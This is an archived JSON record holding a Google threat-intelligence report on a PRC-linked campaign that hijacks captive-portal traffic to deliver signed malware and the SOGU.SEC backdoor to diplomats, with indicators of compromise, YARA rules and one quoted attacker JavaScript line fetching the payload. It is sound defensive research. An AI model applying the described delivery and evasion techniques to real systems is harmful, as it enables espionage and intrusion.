{ "id": "e813db0c-0e8b-46d6-9540-9ebdc5f3e49f", "created_at": "2026-04-06T00:14:56.406394Z", "updated_at": "2026-04-10T03:36:33.744646Z", "deleted_at": null, "sha1_hash": "919c2559685350434cb4e22aacb7bcc78ea20c25", "title": "PRC-Nexus Espionage Campaign Hijacks Web Traffic to Target Diplomats", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1116144, "plain_text": "PRC-Nexus Espionage Campaign Hijacks Web Traffic to Target\r\nDiplomats\r\nBy Google Threat Intelligence Group\r\nPublished: 2025-08-25 · Archived: 2026-04-02 10:53:31 UTC\r\nWritten by: Patrick Whitsell\r\nIn March 2025, Google Threat Intelligence Group (GTIG) identified a complex, multifaceted campaign attributed to the\r\nPRC-nexus threat actor UNC6384. The campaign targeted diplomats in Southeast Asia and other entities globally. GTIG\r\nassesses this was likely in support of cyber espionage operations aligned with the strategic interests of the People's\r\nRepublic of China (PRC). \r\nThe campaign hijacks target web traffic, using a captive portal redirect, to deliver a digitally signed downloader that\r\nGTIG tracks as STATICPLUGIN. This ultimately led to the in-memory deployment of the backdoor SOGU.SEC (also\r\nknown as PlugX). This multi-stage attack chain leverages advanced social engineering including valid code signing\r\ncertificates, an adversary-in-the-middle (AitM) attack, and indirect execution techniques to evade detection.\r\nGoogle is actively protecting our users and customers from this threat. We sent government-backed attacker alerts to all\r\nGmail and Workspace users impacted by this campaign. We encourage users to enable Enhanced Safe Browsing for\r\nChrome, ensure all devices are fully updated, and enable 2-Step Verification on accounts. Additionally, all identified\r\ndomains, URLs, and file hashes have been added to the Google Safe Browsing list of unsafe web resources. Google\r\nSecurity Operations (SecOps) has also been updated with relevant intelligence, enabling defenders to hunt for this\r\nactivity in their environments.\r\nOverview\r\nThis blog post presents our findings and analysis of this espionage campaign, as well as the evolution of the threat\r\nactor’s operational capabilities. We examine how the malware is delivered, how the threat actor utilized social\r\nengineering and evasion techniques, and technical aspects of the multi-stage malware payloads. \r\nIn this campaign, the malware payloads were disguised as either software or plugin updates and delivered through\r\nUNC6384 infrastructure using AitM and social engineering tactics. A high level overview of the attack chain: \r\n1. The target’s web browser tests if the internet connection is behind a captive portal;\r\n2. An AitM redirects the browser to a threat actor controlled website;\r\n3. The first stage malware, STATICPLUGIN, is downloaded;\r\n4. STATICPLUGIN then retrieves an MSI package from the same website;\r\n5. Finally, CANONSTAGER is DLL side-loaded and deploys the SOGU.SEC backdoor.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 1 of 13\n\nFigure 1: Attack chain diagram\r\nMalware Delivery: Captive Portal Hijack\r\nGTIG discovered evidence of a captive portal hijack being used to deliver malware disguised as an Adobe Plugin update\r\nto targeted entities. A captive portal is a network setup that directs users to a specific webpage, usually a login or splash\r\npage, before granting internet access. This functionality is intentionally built into all web browsers. The Chrome browser\r\nperforms an HTTP request to a hardcoded URL ( “http://www.gstatic.com/generate_204 ”) to enable this redirect\r\nmechanism.\r\nWhile “ gstatic.com ” is a legitimate domain, our investigation uncovered redirect chains from this domain leading to\r\nthe threat actor’s landing webpage and subsequent malware delivery, indicating an AitM attack. We assess the AitM was\r\nfacilitated through compromised edge devices on the target networks. However, GTIG did not observe the attack vector\r\nused to compromise the edge devices.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 2 of 13\n\nFigure 2: Captive portal redirect chain\r\nFake Plugin Update \r\nAfter being redirected, the threat actor attempts to deceive the target into believing that a software update is needed, and\r\nto download the malware disguised as a “plugin update”. The threat actor used multiple social engineering techniques to\r\nform a cohesive and credible update theme. \r\nThe landing webpage resembles a legitimate software update site and uses an HTTPS connection with a valid TLS\r\ncertificate issued by Let’s Encrypt. The use of HTTPS offers several advantages for social engineering and malware\r\ndelivery. Browser warning messages, such as “Not Secure” and “Your connection is not private”, will not be displayed to\r\nthe target, and the connection to the website is encrypted, making it more difficult for network-based defenses to inspect\r\nand detect the malicious traffic. Additionally, the malware payload is disguised as legitimate software and is digitally\r\nsigned with a certificate issued by a Certificate Authority.\r\n$ openssl x509 -in mediareleaseupdates.pem -noout -text -fingerprint -sha256\r\nCertificate:\r\n Data:\r\n Version: 3 (0x2)\r\n Serial Number:\r\n 05:23:ee:fd:9f:a8:7d:10:b1:91:dc:34:dd:ee:1b:41:49:bd\r\n Signature Algorithm: sha256WithRSAEncryption\r\n Issuer: C=US, O=Let's Encrypt, CN=R10\r\n Validity\r\n Not Before: May 17 16:58:11 2025 GMT\r\n Not After : Aug 15 16:58:10 2025 GMT\r\n Subject: CN=mediareleaseupdates[.]com\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 3 of 13\n\n---\ntitle: Additional plugins are required to display all the media on this page\n---\nsha256 Fingerprint=6D:47:32:12:D0:CB:7A:B3:3A:73:88:07:74:5B:6C:F1:51:A2:B5:C3:31:65:67:74:DF:59:E1:A4:E2:23:04:68\nFigure 3: Website TLS certificate\nThe initial landing page is completely blank with a yellow bar across the top and a button that reads “ Install Missing\nPlugins… ”. If this technique successfully deceives the target into believing they need to install additional software, they\nmay be more willing to manually bypass host-based Windows security protections to execute the delivered malicious\npayload.\nFigure 4: Malware landing page\nIn the background, Javascript code is loaded from a script file named “ style3.js ” hosted on the same domain as the\nHTML page. When the target clicks the install button “ myFunction ”, which is located in the loaded script, is executed.\n\nwindow.location.href = \"https[:]//mediareleaseupdates[.]com/AdobePlugins.exe\";\r\n}\r\nFigure 6: Javascript from style3.js\r\nThis triggers the automatic download of “ AdobePlugins.exe ” and a new background image to be displayed on the\r\nwebpage. The image shows instructions for how to execute the downloaded binary and bypass potential Windows\r\nsecurity protections.\r\nFigure 7: Malware landing page post-download\r\nWhen the downloaded executable is run, the fake install prompt seen in the above screenshot for “STEP 2” is displayed\r\non screen, along with “ Install ” and \" Cancel ” options. However, the SOGU.SEC payload is likely already running\r\non the target device, as neither button triggers any action relevant to the malware.\r\nMalware Analysis \r\nUpon successful delivery to the target Windows system, the malware initiates a multi-stage deployment chain. Each\r\nstage layers tactics designed to evade host-based defenses and maintain stealth on the compromised system. Finally, a\r\nnovel side-loaded DLL, tracked as CANONSTAGER, concludes with in-memory deployment of the SOGU.SEC\r\nbackdoor, which then establishes communication with the threat actor's command and control (C2) server.\r\nDigitally Signed Downloader: STATICPLUGIN\r\nThe downloaded “ AdobePlugins.exe ” file is a first stage malware downloader. The file was signed by Chengdu Nuoxin\r\nTimes Technology Co., Ltd. with a valid certificate issued by GlobalSign. Signed malware has the major advantage of\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 5 of 13\n\nbeing able to bypass endpoint security protections that typically trust files with valid digital signatures. This gives the\r\nmalware false legitimacy, making it harder for both users and automated defenses to detect. \r\nThe binary was code signed on May 9th, 2025, possibly indicating how long this version of the downloader has been in\r\nuse. While the signing certificate expired on July 14th, 2025 and is no longer valid, it may be easy for the threat actor to\r\nre-sign new versions of STATICPLUGIN with similarly obtained certificates.\r\nFigure 8: Downloader with valid digital signature\r\nSTATICPLUGIN implements a custom TForm which is designed to masquerade as a legitimate Microsoft Visual C++\r\n2013 Redistributables installer. The malware uses the Windows COM Installer object to download another file from\r\n“ https[:]//mediareleaseupdates[.]com/20250509[.]bmp ”. However, the “BMP” file is actually an MSI package\r\ncontaining three files. After installation of these files, CANONSTAGER is executed via DLL side-loading.\r\nFilename Description Hash\r\ncnmpaui.exe\r\nCanon IJ Printer\r\nAssistant Tool\r\n4ed76fa68ef9e1a7705a849d47b3d9dcdf969e332bd5bcb68138579c288a16d3\r\ncnmpaui.dll CANONSTAGER e787f64af048b9cb8a153a0759555785c8fd3ee1e8efbca312a29f2acb1e4011\r\ncnmplog.dat\r\nRC4 Encrypted\r\nSOGU.SEC\r\ncc4db3d8049043fa62326d0b3341960f9a0cf9b54c2fbbdffdbd8761d99add79\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 6 of 13\n\nCertificate Subscriber — Chengdu Nuoxin Times Technology Co., Ltd\r\nOur investigation found this is not the first suspicious executable signed with a certificate issued to Chengdu Nuoxin\r\nTimes Technology Co., Ltd. GTIG is currently tracking 25 known malware samples signed by this Subscriber that are in\r\nuse by multiple PRC-nexus activity clusters. Many examples of these signed binaries are available in VirusTotal.\r\nGTIG has previously investigated two additional campaigns using malware signed by this entity. While GTIG does not\r\nattribute these other campaigns to UNC6384, they have multiple similarities and TTP overlaps with this UNC6384\r\ncampaign, in addition to using the same code signing certificates.\r\n1. Delivery through web-based redirects\r\n2. Downloader first stage, sometimes packaged in an archive. \r\n3. In-memory droppers and memory-only backdoor payloads\r\n4. Masquerading as legitimate applications or updates\r\n5. Targeting in Southeast Asia\r\nIt remains an open question how the threat actors are obtaining these certificates. The Subscriber organization may be a\r\nvictim with compromised code signing material. However, they may also be a willing participant or front company\r\nfacilitating cyber espionage operations. Malware samples signed by Chengdu Nuoxin Times Technology Co., Ltd date\r\nback to at least January 2023. GTIG is continuing to monitor the connection between this entity and PRC-nexus cyber\r\noperations.\r\nMalicious Launcher: CANONSTAGER\r\nOnce CANONSTAGER is executed, its ultimate purpose is to surreptitiously execute the encrypted payload, a variant of\r\nSOGU tracked as SOGU.SEC. CANONSTAGER implements a control flow obfuscation technique using custom API\r\nhashing and Thread Local Storage (TLS). The launcher also abuses legitimate Windows features such as window\r\nprocedures, message queues, and callback functions to execute the final payload. \r\nAPI Hashing and Thread Local Storage\r\nThread Local Storage (TLS) is intended to provide each thread in a multi-threaded application its own private data\r\nstorage. CANONSTAGER uses the TLS array data structure to store function addresses resolved by its custom API\r\nhashing algorithm. The function addresses are later called throughout the binary from offsets into the TLS array. \r\nIn short, the API hashing hides which Windows APIs are being used, while the TLS array provides a stealthy location to\r\nstore the resolved function addresses. Use of the TLS array for this purpose is unconventional. Storing function\r\naddresses here may be overlooked by analysts or security tooling scrutinizing more common data storage locations.\r\nBelow is an example of CANONSTAGER resolving and storing the GetCurrentDirectoryW  function address.\r\n1. Resolve the GetCurrentDirectoryW hash (0x6501CBE1)\r\n2. Get the location of the TLS array from the Thread Information Block (TIB)\r\n3. Move the resolved function address into offset 0x8 of the TLS array\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 7 of 13\n\nFigure 9: Example of storing function addresses in TLS array\r\nIndirect Code Execution \r\nCANONSTAGER hides its launcher code in a custom window procedure and triggers its execution indirectly using the\r\nWindows message queue. Using these legitimate Windows features lowers the likelihood of security tools detecting the\r\nmalware and raising alerts. It also obscures the malware’s control flow by “hiding” its code inside of the window\r\nprocedure and triggering execution asynchronously. \r\nAt a high level, CANONSTAGER:\r\n1. Registers a class containing a callback function;\r\n2. Creates a new window with the registered class;\r\n3. Sends WM_SHOWWINDOW to the message queue;\r\n4. Enters a message loop to receive and dispatch messages to the created window;\r\n5. Creates a new thread to decrypt “ cnmplog.dat ” as SOGU.SEC when the window receives the\r\nWM_SHOWWINDOW message; then\r\n6. Executes SOGU.SEC in-memory with an EnumSystemGeoID callback.\r\nFigure 10: Overview of CANONSTAGER execution using Windows message queue\r\nWindow Procedure \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 8 of 13\n\nOn a Windows system, every window class has an associated window procedure. The procedure allows programmers to\r\ndefine a custom function to process messages sent to the specified window class. \r\nCANONSTAGER creates an Overlapped Window with a registered WNDCLASS structure. The structure contains a\r\ncallback function to the programmer-defined window procedure for processing messages. Additionally, the window is\r\ncreated with a height and width of zero to remain hidden on the screen. \r\nInside the window procedure, there is a check for message type 0x0018 (WM_SHOWWINDOW). When a message of\r\nthis type is received, a new thread is created with a function that decrypts and launches the SOGU.SEC payload. For any\r\nmessage type other than 0x0018 (or 0x2 to ExitProcess), the window procedure calls the default handler\r\n(DefWindowProc), ignoring the message. \r\nMessage Queue \r\nWindows applications use Message Queues for asynchronous communication. Both user applications and the Windows\r\nsystem can post messages to Message Queues. When a message is posted to an application window, the system calls the\r\nassociated window procedure to process the message.\r\nIn order to trigger the malicious window procedure, CANONSTAGER uses the ShowWindow function to send a\r\nWM_SHOWWINDOW (0x0018) message to its newly created window via the Message Queue. Since the system, or\r\nother applications, may also post messages to the CANONSTAGER’s window, a standard Windows message loop is\r\nentered. This allows all posted messages to be sent, including the intended WM_SHOWWINDOW message.\r\n1. GetMessageW - retrieve all messages in the thread’s message queue.\r\n2. TranslateMessage - Convert message from a “virtual-key” to a “character message”.\r\n3. DispatchMessage - Delivers the message to the specific function (WindowProc) that handles messages for the\r\nwindow targeted by that message.\r\n4. Loop back to 1, until all messages are dispatched.\r\nDeploying SOGU.SEC\r\nAfter the correct message type is received by the window procedure, CANONSTAGER moves on to deploying its\r\nSOGU.SEC payload with the following steps:\r\n1. Read the encrypted “ cnmplog.dat ” file, packaged in the downloaded MSI;\r\n2. Decrypt the file with a hardcoded 16-byte RC4 key;\r\n3. Execute the decrypted payload using an EnumSystemsGeoID callback function.\r\nFigure 11: Callback function executing SOGU.SEC\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 9 of 13\n\nUNC6384 has previously used both payload encryption and callback functions to deploy SOGU.SEC. These techniques\r\nare used to hide malicious code, evade detection, obfuscate control flow, and blend in with normal system activity.\r\nAdditionally, all of these steps are done in-memory, avoiding endpoint file-based detections.\r\nThe Backdoor: SOGU.SEC\r\nSOGU.SEC is a distinct variant of SOGU and is commonly deployed by UNC6384 in cyber espionage activity. This is a\r\nsophisticated, and heavily obfuscated, malware backdoor with a wide range of capabilities. It can collect system\r\ninformation, upload and download files from a C2, and execute a remote command shell. In this campaign, SOGU.SEC\r\nwas observed communicating directly with the C2 IP address “ 166.88.2[.]90 ” using HTTPS.\r\nAttribution\r\nGTIG attributes this campaign to UNC6384, a PRC-nexus cyber espionage group believed to be associated with the\r\nPRC-nexus threat actor TEMP.Hex (also known as Mustang Panda). Our attribution is based on similarities in tooling,\r\nTPPs, targeting, and overlaps in C2 infrastructure. UNC6384 and TEMP.Hex are both observed to target government\r\nsectors, primarily in Southeast Asia, in alignment with PRC strategic interests. Both groups have also been observed to\r\ndeliver SOGU.SEC malware from DLL side-loaded malware launchers and have used the same C2 infrastructure. \r\nConclusion\r\nThis campaign is a clear example of the continued evolution of UNC6384's operational capabilities and highlights the\r\nsophistication of PRC-nexus threat actors. The use of advanced techniques such as AitM combined with valid code\r\nsigning and layered social engineering demonstrates this threat actor’s capabilities. This activity follows a broader trend\r\nGTIG has observed of PRC-nexus threat actors increasingly employing stealthy tactics to avoid detection.\r\nGTIG actively monitors ongoing threats from actors like UNC6384 to protect users and customers. As part of this effort,\r\nGoogle continuously updates its protections and has taken specific action against this campaign.\r\nAcknowledgment\r\nA special thanks to Jon Daniels for your contributions.\r\nAppendix: Indicators of Compromise\r\nA Google Threat Intelligence (GTI) collection of related IOCs is available to registered users. \r\nFile Hashes\r\nName Hash (SHA-256)\r\nAdobePlugins.exe 65c42a7ea18162a92ee982eded91653a5358a7129c7672715ce8ddb6027ec124\r\n20250509.bmp (MSI) 3299866538aff40ca85276f87dd0cefe4eafe167bd64732d67b06af4f3349916\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 10 of 13\n\nName Hash (SHA-256)\r\ncnmpaui.dll e787f64af048b9cb8a153a0759555785c8fd3ee1e8efbca312a29f2acb1e4011\r\ncnmplog.dat cc4db3d8049043fa62326d0b3341960f9a0cf9b54c2fbbdffdbd8761d99add79\r\nSOGU.SEC (memory only) d1626c35ff69e7e5bde5eea9f9a242713421e59197f4b6d77b914ed46976b933\r\nCertificate Fingerprints / Thumbprints\r\nName Hash (SHA-1)\r\nmediareleaseupdates[.]com c8744b10180ed59bf96cf79d7559249e9dcf0f90\r\nAdobePlugins.exe eca96bd74fb6b22848751e254b6dc9b8e2721f96\r\nNetwork Indicators\r\nName IOC\r\nLanding Page https[:]//mediareleaseupdates[.]com/AdobePlugins[.]html\r\nJavascript https[:]//mediareleaseupdates[.]com/style3[.]js\r\nSTATICPLUGIN https[:]//mediareleaseupdates[.]com/AdobePlugins[.]exe\r\nMSI Package https[:]//mediareleaseupdates[.]com/20250509[.]bmp\r\nHosting IP 103.79.120[.]72\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 11 of 13\n\nC2 IP 166.88.2[.]90\r\nSOGU.SEC User\r\nAgent\r\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; .NET CLR\r\n2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\nHost Indicators\r\nName IOC\r\nMutex\r\nName\r\nKNbgxngdS\r\nRC4\r\nKey\r\nmqHKVbHWWAJwrLXD\r\nRegistry\r\nKey\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\CanonPrinter=\"%APPDATA%\\cnmpaui.exe\"\r\n9 780\r\nFile\r\nPath\r\n%LOCALAPPDATA%\\DNVjzaXMFO\\\r\nFile\r\nPath\r\nC:\\Users\\Public\\Intelnet\\\r\nFile\r\nPath\r\nC:\\Users\\Public\\SecurityScan\\\r\nYARA Rules\r\nrule G_Downloader_STATICPLUGIN_1 {\r\n meta:\r\n author = \"GTIG\"\r\n date_created = \"2025-07-24\"\r\n date_modified = \"2025-07-24\"\r\n description = \"STATICPLUGIN is a downloader observed to retrieve an MSI packaged payload from a hard-coded C2\r\n md5 = \"52f42a40d24e1d62d1ed29b28778fc45\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 12 of 13\n\nrev = 1\r\n strings:\r\n $s1 = \"InstallRemoteMSI\"\r\n $s2 = \"InstallUpdate\"\r\n $s3 = \"Button1Click\"\r\n $s4 = \"Button2Click\"\r\n $s5 = \"WindowsInstaller.Installer\" wide\r\n condition:\r\n uint16(0)==0x5a4d and all of them\r\n}\r\nrule G_Launcher_CANONSTAGER_1 {\r\n meta:\r\n author = \"GTIG\"\r\n date_created = \"2025-07-25\"\r\n date_modified = \"2025-07-25\"\r\n description = \"CANONSTAGER is a side-loaded DLL launcher used to decrypt and execute a payload in-memory.\"\r\n md5 = \"fa71d60e43da381ad656192a41e38724\"\r\n rev = 1\r\n strings:\r\n $str1 = \".dat\" wide\r\n $str2 = \"\\\\cnmplog\" wide\r\n $code1 = {43 0F B6 ?? 0F B6 [3]00 D0 0F B6 ?? 8A 74 [2]88 74 [2]88 54 [2]8B 7? [2]02 54 [2]0F B6 ?? 0F B6 [3]3\r\n $code2 = {0F B6 [3] 89 ?? 83 E? 0F 00 D0 02 ?? [1-2] 0F B6 ?? 8A 74 [2] 88 74 [2] 4? 88 54 [2]81 F? 00 01 00 0\r\n $code3 = {40 89 ?? 0F B6 C0 0F B6 [3]00 D9 88 9? [4-5]0F B6 F? 8A 7C 3? ?? 88 7C 0? ?? 88 5C 3? ?? 02 5C 0? ??\r\n condition:\r\n all of ($str*) and 2 of ($code*)\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/" ], "report_names": [ "prc-nexus-espionage-targets-diplomats" ], "threat_actors": [ { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "20b5fa2f-2ef1-4e69-8275-25927a762f72", "created_at": "2025-08-07T02:03:24.573647Z", "updated_at": "2026-04-10T02:00:03.765721Z", "deleted_at": null, "main_name": "BRONZE DUDLEY", "aliases": [ "TA428 ", "Temp.Hex ", "Vicious Panda " ], "source_name": "Secureworks:BRONZE DUDLEY", "tools": [ "NCCTrojan", "PhantomNet", "PoisonIvy", "Royal Road" ], "source_id": "Secureworks", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "e09a03a6-ce6c-4f6b-b8c6-38c3edecd743", "created_at": "2026-01-20T02:00:03.665377Z", "updated_at": "2026-04-10T02:00:03.915084Z", "deleted_at": null, "main_name": "UNC6384", "aliases": [], "source_name": "MISPGALAXY:UNC6384", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434496, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/919c2559685350434cb4e22aacb7bcc78ea20c25.pdf", "text": "https://archive.orkl.eu/919c2559685350434cb4e22aacb7bcc78ea20c25.txt", "img": "https://archive.orkl.eu/919c2559685350434cb4e22aacb7bcc78ea20c25.jpg" } }